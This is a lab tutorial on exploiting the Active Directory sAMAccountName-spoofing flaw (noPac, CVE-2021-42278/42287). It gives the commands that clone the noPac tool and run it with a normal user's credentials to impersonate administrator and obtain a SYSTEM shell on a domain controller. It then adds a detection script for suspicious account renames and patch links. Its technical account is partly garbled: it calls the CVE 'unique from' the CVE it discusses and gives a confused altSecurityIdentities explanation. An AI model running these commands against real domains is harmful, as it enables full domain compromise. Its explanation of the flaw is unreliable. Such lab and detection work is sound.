
Windows Privilege Escalation: sAMAccountName Spoofing

This post discusses how CVE-2021-42278 allows an attacker holding only a low-privileged account (any normal domain user) to gain high-privileged access (Administrator-level access on domain controllers).

Description: Active Directory Domain Services Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2021-42278, CVE-2021-42282, CVE-2021-42291.

Release Date: Nov 9, 2021

Impact: Elevation of Privilege

Severity: Important

CVSS score: 8.8

Pentest Lab setup

In our lab setup, a Kali VM is the attacker machine and a Windows domain controller (running a vulnerable Windows version) is the target system. This domain controller has not been patched since November 9, 2021, which leaves it vulnerable to exploitation.

Next, create a user with normal domain user privileges on the test domain controller. This step simulates the low-privileged starting point of the attack.

To check the user's details on the domain controller, run the following command. The output shows the user as a normal domain user (highlighted in red), confirming the privilege level.

net user sakshi

Exploitation

Now, on the attacker system (the Kali VM), clone the exploit from the git repository below.

git clone https://github.com/Ridter/noPac

After cloning the repository https://github.com/Ridter/noPac, navigate into the noPac folder:

cd noPac
ls -al

Then execute the following command:

python3 noPac.py ignite.local/sakshi:'Password@1' -dc-ip 192.168.1.182 -shell --impersonate administrator -use-ldap

This CVE is a security bypass vulnerability caused by Kerberos PAC confusion and the impersonation of domain controllers.

It allows an attacker to impersonate a domain controller by requesting a TGT from Kerberos without a PAC. As soon as Kerberos issues the TGT without a PAC, the attacker can impersonate a highly privileged user.

To achieve this, the altSecurityIdentities attribute is configured so that the domain controller adds a PAC when it receives a service ticket (ST) request that uses a TGT without a PAC.

This involves setting the altSecurityIdentities attribute of an account in a foreign domain to Kerberos:[samaccountname]@[domain] in order to impersonate that user.

As a result, the command executed on the attacker machine (Kali VM) shows that it has obtained "NT AUTHORITY\SYSTEM" privileges.
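The attack chain above hinges on a computer account whose sAMAccountName is temporarily renamed to a domain controller's name without the trailing '$' and then renamed back. The following detection example is added here and is not part of the original post or the noPac tool; it scans constructed Windows Security event records laid out like Event ID 4781 ("The name of an account was changed") and flags renames matching that pattern. The DC_NAMES set, the event field names and the sample events are assumptions for the example.

```python
# Added example (not from the original post): flag sAMAccountName changes that
# match the sAMAccountName-spoofing pattern in Security event 4781 records.
# Event records, field names and DC hostnames below are constructed.

# Constructed domain-controller hostnames (sAMAccountName without the '$').
DC_NAMES = {"DC01", "DC02"}

# Constructed sample events; field names are assumed to mirror the 4781 layout.
SAMPLE_EVENTS = [
    {"EventID": 4781, "OldTargetUserName": "WIN-CLIENT7$",
     "NewTargetUserName": "WIN-CLIENT7B$", "SubjectUserName": "helpdesk1"},
    {"EventID": 4781, "OldTargetUserName": "EVILPC$",
     "NewTargetUserName": "DC01", "SubjectUserName": "sakshi"},
    {"EventID": 4781, "OldTargetUserName": "DC01",
     "NewTargetUserName": "EVILPC$", "SubjectUserName": "sakshi"},
    {"EventID": 4781, "OldTargetUserName": "LAB-PC9$",
     "NewTargetUserName": "LAB-PC9", "SubjectUserName": "sakshi"},
    {"EventID": 4742, "TargetUserName": "DC02$", "SubjectUserName": "svc_admin"},
]


def classify_rename(event):
    """Return a reason string if the rename looks like sAMAccountName spoofing, else None."""
    if event.get("EventID") != 4781:
        return None
    old, new = event["OldTargetUserName"], event["NewTargetUserName"]
    # Step 1 of the attack: a computer account drops its '$' (worst case: to a DC name).
    if old.endswith("$") and not new.endswith("$"):
        if new.upper() in DC_NAMES:
            return "computer account renamed to a DC name without '$'"
        return "computer account lost its trailing '$'"
    # Cleanup step: a name matching a DC is renamed back to a computer account.
    if not old.endswith("$") and new.endswith("$") and old.upper() in DC_NAMES:
        return "name matching a DC renamed back to a computer account"
    return None


def find_suspicious_renames(events):
    """Return (subject, old name, new name, reason) for every flagged event."""
    hits = []
    for ev in events:
        reason = classify_rename(ev)
        if reason:
            hits.append((ev["SubjectUserName"], ev["OldTargetUserName"],
                         ev["NewTargetUserName"], reason))
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_renames(SAMPLE_EVENTS):
        print(hit)
```

A legitimate rename that keeps the trailing '$' (the first sample event) is not flagged, so the rule can be run over 4781 events with little noise; the SubjectUserName field identifies the account that performed the rename.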

Mitigation

KB5008602 – https://support.microsoft.com/en-us/topic/november-14-2021-kb5008602-os-build-17763-2305-out-of-band-8583a8a3-ebed-4829-b285-356fb5aaacd7

KB5008380 – https://support.microsoft.com/en-us/topic/kb5008380-authentication-updates-cve-2021-42287-9dafac11-e0d0-4cb8-959a-143bd0201041

References:

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42287

Author details: Amit Kishor has more than 10 years of network security experience, with expertise in multiple firewall products as well as SaaS products. Contact on LinkedIn